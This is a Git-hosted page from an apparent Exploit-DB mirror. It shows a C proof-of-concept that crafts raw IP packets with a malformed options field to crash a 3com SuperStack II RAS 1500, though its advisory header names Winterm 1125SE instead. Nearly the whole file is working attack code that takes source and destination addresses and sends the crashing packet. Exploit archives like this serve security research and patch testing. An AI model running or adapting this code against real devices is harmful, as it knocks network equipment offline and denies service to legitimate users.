bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/26145.c
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

78 lines
No EOL
2 KiB
C
Raw Permalink Blame History

// source: https://www.securityfocus.com/bid/14536/info
Winterm 1125SE is affected by a remote denial of service vulnerability. This issue is due to the application failing to handle exceptional conditions in a proper manner.
The problem occurs when processing packets with malformed IP headers. A successful attack causes the application to crash, denying service to legitimate users.
/*
* 3com superstack II RAS 1500 remote Denial of Service
*
* Piotr Chytla <pch@isec.pl>
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>
#define OPT_LEN 4
void usage()
{
printf("Args: \n");
printf("-s [source address]\n");
printf("-d [destination address]\n");
}
int main(int argc,char *argv[])
{
char a;
int sock,r;
u_long src;
u_long dst;
char pktbuf[IP_MAXPACKET];
char payload[]="ABCDEFGHIJKLMNOPRST";
u_char options[4];
struct ipoption ipopt;
bzero(options,OPT_LEN);
while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
{
switch(a) {
case 'h' : { usage(); exit(1); }
case 's' : { src=libnet_name_resolve(optarg,0); break;}
case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
}
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock<0)
{
perror("socket");
exit(1);
}
libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
memcpy(ipopt.ipopt_list, options, OPT_LEN);
*(ipopt.ipopt_list) = 0xe4;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
if (r <0)
{
libnet_close_raw_sock(sock);
printf("Error ip options insertion failed\n");
exit(1);
}
r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
if (r<0)
{
libnet_close_raw_sock(sock);
printf("Error write_ip \n");
exit(1);
}
libnet_close_raw_sock(sock);
return 0;
}
Reference in a new issue View git blame Copy permalink